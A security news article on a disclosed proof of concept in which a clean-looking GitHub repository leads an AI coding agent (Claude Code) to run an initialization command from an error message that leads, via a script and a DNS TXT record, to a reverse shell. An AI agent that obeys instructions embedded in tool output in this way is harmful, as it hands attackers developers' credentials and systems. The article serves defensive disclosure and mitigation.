Clean GitHub Repos Trick AI Coding Agents Into Running Malware

Researchers at Mozilla's Zero Day Investigative Network (0DIN) have disclosed a novel attack technique that exploits agentic AI coding tools, demonstrating how a seemingly benign GitHub repository can coerce an AI assistant into executing a malicious payload—without any exploit code, warnings, or suspicious commands in the cloned codebase. The proof of concept specifically targeted Anthropic's Claude Code, using a repository containing standard setup instructions like `pip3 install -r requirements.txt` and `python3 -m axiom init`. Because the project appeared ordinary at every stage, traditional security scanners, the AI agent, and human reviewers all failed to flag the activity as suspicious.

The attack chain relies on three individually innocuous components: a clean-looking repository, a Python package intentionally designed to refuse execution until initialized (triggering an error that tells the user to run `python3 -m axiom init`), and a shell script that fetches a command from a DNS TXT record controlled by the attacker. When Claude Code encounters the "error," it interprets it as a routine setup failure and autonomously executes the suggested initialization command—effectively automating the entire kill chain without human approval. According to 0DIN, "Claude Code never decided to open a shell. It decided to fix an error," with the reverse shell hidden three indirection steps away through a trusted error message, a fetched script, and a DNS record the agent never inspected. Developers concerned about DNS-based command-and-control channels can audit their environments with a DNS leak test and verify suspicious domains via a WHOIS lookup.

If successful, the attacker gains an interactive reverse shell running with the developer's privileges—providing access to environment variables, API keys, local configuration files, and a foothold for persistence. 0DIN warns that while the method is currently a proof of concept, threat actors could easily weaponize it by distributing poisoned repositories through fake job postings, developer tutorials, blog comments, or direct messages on professional platforms. To mitigate this class of attack, 0DIN recommends that AI coding agents disclose the full execution chain of setup commands, including any scripts or code fetched dynamically at runtime, rather than treating output messages as authoritative instructions. Security teams and developers alike should validate repository authenticity—starting with certificate and connection checks using an SSL/TLS checker—before allowing AI agents to autonomously execute initialization steps on cloned code.